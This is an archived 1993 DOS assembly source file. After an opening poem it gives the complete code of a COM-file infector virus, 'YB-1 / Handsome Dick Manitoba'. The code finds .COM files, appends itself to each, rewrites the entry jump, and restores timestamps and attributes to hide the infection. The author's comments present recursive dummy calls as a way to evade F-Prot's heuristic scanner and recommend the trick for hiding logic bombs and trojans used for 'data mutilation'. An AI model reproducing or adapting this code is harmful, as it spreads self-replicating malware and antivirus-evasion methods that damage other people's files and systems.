home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / CRYPT17.ZIP / YB-X.ASM < prev    next >
Encoding:
Assembly Source File  |  1993-08-11  |  15.2 KB  |  437 lines
  1. comment #  
  2.  
  3.   PRE-IGNITION
  4.   Hey you...
  5.   Tell me, what's your call name
  6.   Closed, negative display
  7.   Engaged on section three
  8.   The acrid factories
  9.   You...
  10.   Putrid perfect product
  11.   Proper platinum parts
  12.   Proficient prototypes
  13.   Steadily spew from these pipes
  14.   Are you...
  15.   The prime automaton
  16.   Christened as YB-1
  17.   Hey you...
  18.   Generated by waste
  19.   Arid quarry displaced
  20.   Enviro-mental squeeze
  21.   Aluminum disease
  22.   You...
  23.   Conscious of origin
  24.   Intention in the wind
  25.   Atmosphere infected
  26.   Descendants defected
  27.   Are you...
  28.   Novel stroke of design
  29.   Or relics from this mine
  30.   Casually, choke,
  31.   Noxious nourishment
  32.   Embodied, illicit cure
  33.   Ground and rock and sand
  34.   Come crumble tumble down
  35.   Grinding round
  36.   The hydraulic wheel
  37.   Extraction,
  38.   For ultimate greed
  39.   Now... hidden from view
  40.   Surveying stable shifts
  41.   A feeble groove
  42.   Unintentional split
  43.   Then they return to work
  44.   As if they're not disturbed
  45.   Cybernetic beings
  46.   Omniscient regiment
  47.   Thriving with vigor
  48.   Incessant loop
  49.   An assumed order
  50.   Auspicious tool
  51.   Frantically, flow
  52.   Spumous sediment
  53.   Remedied, neurotic fuse
  54.   Ground and rock and sand
  55.   Come crumble tumble down
  56.   Yonder sound, an echoing gong
  57.   Disjunction
  58.   Of their disowned song
  59.   Now... some are set free
  60.   Emotions flood their gaze
  61.   Synthetic breed
  62.   The pre-ignition phase
  63.   Pre-ignition
  64.   Flares up in you
  65.   Pre-ignition
  66.   Provokes me too.
  67.  
  68. #
  69.  
  70. ;**********************************************************************
  71. ; YB-5 & HANDSOME DICK MANITOBA  
  72. ; AUTHOR:  Köhntark; surgeon: Urnst Kouch
  74. ;
  75. ; Yes, another 'unremarkable' virus . . . it still will put a few more
  76. ; dollars in the accounts of the AV industry . . .
  77. ;**********************************************************************
  78. ;This virus is a simple demonstrator with a series of 'nothing' CALLS
  79. ;on virus entry which point to a end segment of recursive code which 
  80. ;are is sufficient to foil F-Prot's 'heuristic'mode. It's not elegant 
  81. ;clever or pretty or particularly smart, but it works. However,
  82. ;it's clear that such an arrangement of code can quickly make almost
  83. ;ANY direct action virus invisible to cursory F-Prot scanning
  84. ;which attempts to identify suspicious code on its similarity to viral
  85. ;patterns.  The utility depends upon circumstance.  In practice,
  86. ;we find almost no one but virus writers and anti-virus researchers
  87. ;use the 'heuristic' features of commercial programs.  And very few
  88. ;of them actually pay for the software, so it can hardly be considered
  89. ;'real world'.  By contrast, it has been our experience that few 
  90. ;administrators or PC herdsmen have the patience or time to interpret
  91. ;heuristic analyses across numerous minutely different, yet
  92. ;idiosyncratic operating systems and platforms.  The 'anti-heuristic' code
  93. ;practicality, then, lies - we feel - mostly in disguising direct
  94. ; action viruses, --------->
  95. ;logic bombs or trojan programs for quick acts of data mutilation or
  96. ;pure harrassment.  By looking at the simple implementation in YB-1/
  97. ;Handsome Dick Manitoba virus, it's clear that this kind of disguise
  98. ;is barely 5 minutes of work for even the feeblest programmer, hence
  99. ;its utility in the above categories.  In the long run, it's not
  100. ;likely to mean much difference in viral spread, although,
  101. ;it may have made a difference if included in the "Goddamn Butterflies"
  102. ;virus which was distributed in Telemate shareware packages.  Most
  103. ;warnings were issued by sysops who had scanned the Telemate programs
  104. ;with F-Prot in its 'heuristic' mode, which correctly pointed out
  105. ;the nature of the virus infection.  Including the outlined code from
  106. ;Handsome Dick Manitoba/YB-1, below, in the same "Goddamn Butterflies"
  107. ;virus, renders it invisible to scanning under the SAME conditions.
  108. ;This particular example does not get past TBScan's heuristic mode
  109. ;which works differently than F-Prot.  
  110.  
  111. MAIN    SEGMENT BYTE
  112.         ASSUME cs:main,ds:main,ss:nothing      ;all part in one segment=com file
  113.         ORG    100h
  114.  
  115. ;**********************************
  116. ;  fake host program
  117. ;**********************************
  118.  
  119. HOST:
  120.         db    0E9h,0Ah,00          ;jmp    NEAR PTR VIRUS
  121.         db     '  '
  122.         db     090h,090h
  123.         mov    ah,4CH
  124.         mov    al,0
  125.         int    21H                 ;terminate normally with dos
  126.  
  127. ;═════════════════════════════════════════════════════════════════════════════
  128.  
  129. ;**********************************
  130. ; VIRUS CODE STARTS HERE
  131. ;**********************************
  132.  
  133.  
  134. VIRUS:                            ;a label for the first byte of the virus
  135.  
  136.             call ANTI_HEUR        ;30 cents worth of anti-F-Prot type
  137.             call ANTI_HEUR        ;heuristic analysis measures
  138.             call ANTI_HEUR        ;the key is the 'recursive' nature of
  139.             call ANTI_HEUR        ;the code pointed to be the ANTI-HEUR
  140.             call ANTI_HEUR        ;calls.  When a certain threshold of
  141.             call ANTI_HEUR        ;interior 'twisting' - bytewise - occurs
  142.             call ANTI_HEUR        ;F-Prot gives up in heuristic mode.
  143.             call ANTI_HEUR        ;It's not elegant, but it's cheap
  144.             call ANTI_HEUR        ;insurance which
  145.             call ANTI_HEUR        ;works.
  146.             
  147.             call GET_ENTRY_PT   ;<--when call is performed absolute address goes to stack
  148.                                 ;in addition, it is unlikely these bytes will
  149. GET_ENTRY_PT:                   ;be used for signature recognition - unless
  150.             pop  si             ;someone is criminally stupid.
  151.             sub  si,GET_ENTRY_PT - VIRUS  ;fix absolute address
  152.  
  153.  
  154.  
  155. ;************************************           
  156. ; restore 4 original bytes to file
  157. ;************************************
  158.            
  159.            push si                                ;save si
  160.            cld                                    ;clear direction flag
  161.            add  si,START_CODE-VIRUS
  162.            mov  di,0100h
  163.            movsw                                  ;this is shorter & faster than 
  164.            movsw                                  ;mov cx,04 and rep movsb
  165.            pop  si                                ;restore si
  166.  
  167.            call ANTI_HEUR      ;another 30 cents worth of anti-F-Prot
  168.            call ANTI_HEUR
  169.            call ANTI_HEUR
  170.            call ANTI_HEUR
  171.            call ANTI_HEUR
  172.            call ANTI_HEUR
  173.            call ANTI_HEUR
  174.            call ANTI_HEUR
  175.            call ANTI_HEUR
  176.            call ANTI_HEUR
  177.  
  178. ;************************************           
  179. ; redirect DTA onto virus code
  180. ;************************************
  181.            
  182.    lea  dx,[si+ DTA - VIRUS]      ;put DTA at the end of the virus for now
  183.    mov  ah,1ah                    ;set new DTA function
  184.    int  21h
  185.  
  186. ;************************************
  187. ; Routines called from here           
  188. ;************************************
  189.  
  190.            call FIND_FILE       ;get a com file to attack!
  191.  
  192.  
  193. ;═════════════════════════════════════════════════════════════════════════════
  194.  
  195. EXIT_VIRUS:
  196.            
  197. ;************************************
  198. ; set old  DTA  address
  199. ;************************************
  200.  
  201.            mov ah,1ah
  202.            mov dx,80h            ;fix dta back to return control to
  203.            int 21h               ;host program
  204.  
  205.  
  206. EXIT_VIRUS2:
  207.  
  208. ;****************************************************************
  209. ; zero out registers for return to
  210. ; host program
  211. ;****************************************************************
  212.  
  213.  mov  si,0100h     
  214.  xor  bx,bx
  215.  xor  ax,ax
  216.  
  217.  
  218.  push si           ;save return address in stack
  219.  xor  dx,dx
  220.  xor  si,si
  221.  xor  di,di
  222.  ret               ;back to com host
  223.  
  224.  
  225. ;*****************************************************************
  226.  
  227. ANTI_HEUR:                       ;25 cents worth of anti-heuristic
  228.                 jmp  $ + 2       ;virus strategy.  Nothing code
  229.                 call dolt
  230.                 call dolt 
  231.                 call dolt
  232.                 call dolt
  233.                 
  234.                 ret              ;sufficient to flummox analysis.
  235. DOLT:           jmp $ + 2
  236.                 call dolt2       ;by recursively twisting the flow
  237.                 call dolt2       ;of virus instructions until the
  238.                 call dolt2       ;rules of F-Prot are
  239.                 call dolt2       ;by-passed.  Actually, you can 
  240.                 ret
  241. DOLT2:          jmp $ + 2
  242.                 call dolt3       ;probably use much more elegant code,
  243.                 call dolt3       ;but the point to be made is one of
  244.                 call dolt3       ;speed of implementation and simple
  245.                 call dolt3       ;code additions which will not complicate
  246.                 ret              ;the work of the virus or necessitate
  247. DOLT3:          jmp $ + 2        ;altering any of its actual "action"
  248.                 ret              ;code
  249. ;═════════════════════════════════════════════════════════════════════════════
  250.  
  251. FIND_FILE:
  252.                 
  253.                 lea  dx,[si + FILES_TO_INFECT - VIRUS] 
  254.                 mov  ah,4eh   ;do DOS search 1st function
  255.                 mov  cx,3fh   ;search for any file, with any attributes
  256.  
  257. NEXT_FILE:      int  21h
  258.                 jc   NO_MO               ;return if not zero
  259.                 call CHECK_N_INFECT_FILE ;check file if file found
  260.                 mov  ah,4fh              ;file no good, find next function
  261.                 jmp  NEXT_FILE           ;test next file for validity
  262.  
  263. NO_MO:
  264.                 ret
  265.  
  266. ;═════════════════════════════════════════════════════════════════════════════
  267.  
  268. CHECK_N_INFECT_FILE:
  269.  
  270. ;*****************
  271. ; 1-OPEN FILE
  272. ;*****************
  273.  
  274.             lea  dx,[ si + FNAME - VIRUS]  ;open the file
  275.             mov  ax,3D02h                                ;r/w access to it
  276.             int  21h
  277.             jc   NO_GOOD                                 ;error.. quit
  278.             xchg bx,ax                                   ;bx = file handle
  279.  
  280. ;********************
  281. ; 2-Read 1st 5 bytes
  282. ;********************
  283.             
  284.             mov  cx,5                            ;read first 5 bytes of file
  285.             lea  dx,[si + START_CODE - VIRUS] ;store'em here
  286.             mov  ah,3Fh                         ;DOS read function
  287.             int  21h
  288.             jc   NO_GOOD                        ;error? get next file
  289.  
  290. ;*********************
  291. ; 3-CHECK FILE
  292. ;*********************
  293.             
  294.             mov  ax,WORD PTR [si + FSIZE - VIRUS] ;get file's size
  295.             add  ax,FINAL - VIRUS                 ;add virus size to it
  296.             jc   NO_GOOD                          ;bigger then 64K:nogood
  297.             
  298.             cmp  WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file?
  299.             je   NO_GOOD                           ;no? good
  300.  
  301.             cmp  BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp
  302.             jne  INFECT                            ;not a near jmp, file ok
  303.  
  304.             cmp  BYTE PTR [si + START_CODE+3 - VIRUS],20h  ;check for ' '
  305.             je   NO_GOOD                           ;file ok .. infect
  306.             jmp  short  INFECT
  307.  
  308. ;****************        
  309. ; Close File 
  310. ;****************
  311.  
  312. NO_GOOD:
  313.         mov  ah,3Eh                                  ;close file handle
  314.         int  21h                                     ;call real int21h
  315.         ret                                          ;return
  316.  
  317.  
  318. INFECT:
  319.  
  320. ;*********************************************
  321. ; 4-Get & Save File Attributes
  322. ;*********************************************
  323.  
  324.        lea dx,[si + FNAME - VIRUS]
  325.        mov ax,4300h                                       ;get file attributes in cx
  326.        int 21h                                            ;call real int21h
  327.        mov WORD PTR [si + ATTR - VIRUS],cx  ;save attributes
  328.  
  329. ;*********************************************
  330. ; 5-Set attributes
  331. ;*********************************************
  332.  
  333.        and cx,0FFFFh                          ;set attributes to normal
  334.        mov ax,4301h                           ;set file attributes to cx
  335.        int 21h
  336.  
  337. ;*********************************************        
  338. ; 6-Save date and time of file to be infected
  339. ;*********************************************
  340.  
  341.         mov  ax,5700h
  342.         int  21h
  343.         mov  WORD PTR [si + F_DATE - VIRUS],dx
  344.         mov  WORD PTR [si + F_TIME - VIRUS],cx
  345.  
  346. ;*********************        
  347. ; 7-set PTR @EOF
  348. ;*********************
  349.  
  350.         xor  cx,cx                 ;prepare to write virus on file
  351.         xor  dx,dx                 ;position file pointer,cx:dx = 0
  352.         mov  ax,4202H
  353.         int  21h
  354.  
  355. ;*********************        
  356. ; 8-append virus
  357. ;*********************
  358.  
  359.         mov dx,si       ; start of virus
  360.         mov cx,FINAL - VIRUS    
  361.                          ; write virus to end
  362.         mov     ah,40h   ; write to file
  363.                      
  364.  
  365.         int  21h   
  366. ;*********************        
  367. ; 9-set PTR @BOF
  368. ;*********************
  369.  
  370.         xor  cx,cx                           
  371.         xor  dx,dx         ;position file pointer,cx:dx = 0
  372.         mov  ax,4200h      ;locate pointer at beginning of host
  373.         int  21h
  374.  
  375. ;******************************************
  376. ; 10-write new 4 bytes to beginning of file
  377. ;******************************************
  378.         
  379.         mov  ax,WORD PTR [si + FSIZE - VIRUS]  
  380.         sub  ax,3
  381.         mov  WORD PTR [si + START_IMAGE+1 - VIRUS],ax
  382.         
  383.         mov  cx,4                                 ;#of bytes to write
  384.         lea  dx,[si+ START_IMAGE - VIRUS]         ;ds:dx=pointer of data to write
  385.         mov  ah,40h                               ;DOS write function
  386.         int  21h      ;call real int21h
  387.  
  388. ;*************************************************        
  389. ; 11-Restore date and time of file to be infected
  390. ;*************************************************
  391.  
  392.         mov  ax,5701h
  393.         mov  dx,WORD PTR [si + F_DATE - VIRUS]
  394.         mov  cx,WORD PTR [si + F_TIME - VIRUS]
  395.         int  21h
  396.  
  397. ;*************************************************        
  398. ; 12-Restore file's attributes
  399. ;*************************************************
  400.  
  401.        lea dx,[si + FNAME - VIRUS]          ;get filename
  402.        mov cx,[si + ATTR - VIRUS]           ;get old attributes
  403.        mov ax,4301h                         ;set file attributes to cx
  404.        int 21h
  405.  
  406. ;****************        
  407. ; 13-Close File 
  408. ;****************
  409.  
  410. NO_GOOD2:
  411.         mov  ah,3Eh
  412.         int  21h
  413.         ret                                          ;infection done!
  414.  
  415. ;═════════════════════════════════════════════════════════════════════════════
  416.  
  417. NAME_AUTHOR     db  'YB-1 & Handsome Dick Manitoba / Köhntark'
  418. FILES_TO_INFECT db  '*.COM',0 
  419. START_CODE      db  090h,090h,090h,090h,090h  ;area to store 5 bytes to w/r from / to file
  420. START_IMAGE     db  0E9h,0,0,020h
  421.  
  422. INT_21          dd  0
  423. ATTR            dw  0
  424. F_DATE          dw  0
  425. F_TIME          dw  0
  426. DTA             db  1Ah dup (?)                   
  427. FSIZE           dw  0,0               ;file size storage area
  428. FNAME           db  13 dup (?)         ;area for file path
  429.  
  430. ;═════════════════════════════════════════════════════════════════════════════
  431.  
  432. FINAL:                ;label of byte of code to be kept in virus when it moves
  433.  
  434. MAIN ENDS
  435.      END    HOST
  436.  
  437.